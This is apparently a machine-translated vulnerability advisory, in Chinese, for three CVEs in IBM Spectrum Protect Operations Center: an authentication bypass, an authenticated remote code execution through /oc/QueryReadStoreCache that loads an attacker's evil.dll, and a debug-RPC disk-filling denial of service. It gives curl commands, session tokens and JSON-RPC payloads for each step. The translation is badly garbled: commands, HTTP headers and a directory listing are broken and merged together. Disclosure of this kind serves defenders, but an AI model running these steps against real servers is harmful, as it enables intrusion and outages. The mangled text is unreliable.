CVE-2020-4954:验证旁路
sv3向量:(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)
CVSSv3基准分数6.5
安装后操作中心需要配置频谱保护服务器通过webUI作为其中心服务器配置期间,枢纽服务器IP:港务和行政证书用于访问枢纽服务器操作中心连接中心服务器后,用户可使用中心服务器存储的行政证书登录中心
非认证远程攻击者仍可登录操作中心,中心已通过URL端点/oc/配置配置中心配置中心服务器攻击者搭建Spectrum保护服务器并提供配置页中的IP:port和证书允许攻击者获取操作中心认证会议
登录后,攻击者似乎无法执行需要访问配置中心服务器的操作,因为登录会话有攻击者证书,与为中心服务器配置的证书不匹配。s/he可执行无需中心服务器访问的其他认证操作攻击者可启动OpsCntrLog.config并查看日志内容
使用下列步骤获取操作中心认证会议
a) 获取登录JESSIONID和xtoken
curl-kis-tlsv1.2'
:11090/oc/configuration' | egrep 'JSESSIONID|xtoken' Set-Cookie: JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3!路径s/oc安全安全htp唯一
登录操作中心使用攻击者控制频谱保护服务器证书302=成功
curl -kis --tlsv1.2 --cookie 'JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3' -H 'Host:
11090-HORIGIN:
11090-d连接
3A1500&login
密码=
&useSSL=true&useTLS12Only=true&tzoffset=300&nextURL=&xtoken=EEEEFFED-645A-4514-955C-C336EF236403' -D - -o /dev/null 'https://
HTTP1.1302发现X-FRAME-Options:SAMEORIGIN X-XSS-protectiveX-Content-Type-Objects:Nosniff内容安全-策略连接src wss:Ing-src'self数据:*字体弧自数据 :report-uri csp-report Strict-Transport-Security: max-age=31536000!包括子域位置:httpss/
:11090/oc/gui#configure
CVE-2020-4955:QueryReadStoreCache认证RCE
sv3向量:(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CVSSv3基准分数8.8
认证远程攻击者可以向/oc/QueryReadStoreCache/发送特制HTTPP消息,加载攻击者控制库文件(即DLL)到操作中心进程,导致远程代码执行
下片段显示易损性 :
无效控件Post(最后HtpServlet请求重q,最后HtpServlet响应ssp)扔ServletExceptive,IOExceptition{QueryReadStoreCache.log.logginfo+reqfinalStringsservationuriservice至少需要四条路径{最终地图参数s=req.getParametermap终极字符串服务器Name=req.getParaeter决赛类
类Stance=类.forName(url[3])final方法=类Instance.getMethod(url[4])
[])QueryReadStoreCache.CLASS_ARGUMENT)!final JSONArray list = JSONUtils.getFirstItemsArray(((JSONString)method.invoke(null, serverName)).toString())![.]
POST处理器从 URL提取ava类(url[3)和该类方法名(url[4)并引用方法方法应该是静态方法,取单参数,由server URL参数提供攻击者向 URL/oc/QueryReadStoreCache/java.lang.system/加载server参数
some_share\evil.dll,攻击者控制邪恶DLL被加载到操作中心进程中,通向RCE
与弱点1并用时,攻击者可以在操作中心账户安全方面实现非认证RCE(即Windows系统账户)。
CVE-2020-4956:调试RPC认证远程DOS
sv3向量:(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H)
CVSSv3基准分数7.1
验证攻击者可发布setCachevalueRPC调用以设置操作中心缓存大值并反复发布dumpCache调用以创建运算中心主机大片缓存文件可填充缓存倾置文件存放文件系统,通向 DoS
与弱点1并用时,攻击者可实现非认证远程DOS
步骤创建缓存倾置文件
a) 从弱点1获取经认证JESSIONID和xtoken
(b) 有了经认证JESSIONID操作中心后,我们可以在SPOC缓存中创建大型缓存
echo -en '{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.tsm.gui.rpc.handlers.DebugRPC","methodName":"setCacheValue","methodArgs":["KEY1","'$(python3 -c "print('A'*10000000)")'"]}' > /tmp/cacheValue1 curl -kis --tlsv1.2 --cookie 'JSESSIONID=0000HTCQksYD8Jr60DyZAj15mXa:50e18252-bcbc-4523-aa0b-79391fe7cec3' -H 'Host:
11090-HORIGIN:
11090'-Hxtoken:EEEFFED-645A-4514-955C-C336EF236403'-HCente-Type应用/json-rpc'-d
:11090/oc/RPCAdapter'
多次倾弃缓存
实事求是ssv1.2-cookiejsQsYD8Jr60DyZAj15mXa:50e18252-bc-4523-a0b-79391fec3
11090-HORIGIN:
:11090' -H 'xtoken: EEEEFFED-645A-4514-955C-C336EF236403' -H 'Content-Type: application/json-rpc' -d '{"clazz":"com.ibm.evo.rpc.RPCRequest","methodClazz":"com.ibm.tsm.gui.rpc.handlers.DebugRPC","methodName":"dumpCache","methodArgs":[]}' --compress 'https://
:11090/oc/RPCAdapter'!完成后
对每个转储点都用临时文件夹创建不同的转储文件攻击者通过创建一个或多个自选大小缓存values控制倾置文件大小可填充文件系统并通达DOS
C:Windows\System32\config系统剖面数\AppData\Loblical\Tems>dir+卷序号为 1A68-87EC目录C:\WindowsSystem32\config\sy
.11/13/202012:18
.11/13/201214缓存10,107,457缓存10,107,270737956t11/13201214AM10,107,457缓存1052269323425.txt11/13/20201215AM10,107457缓存101140866720073.txt11/13201212107457缓存10,107105179666375.t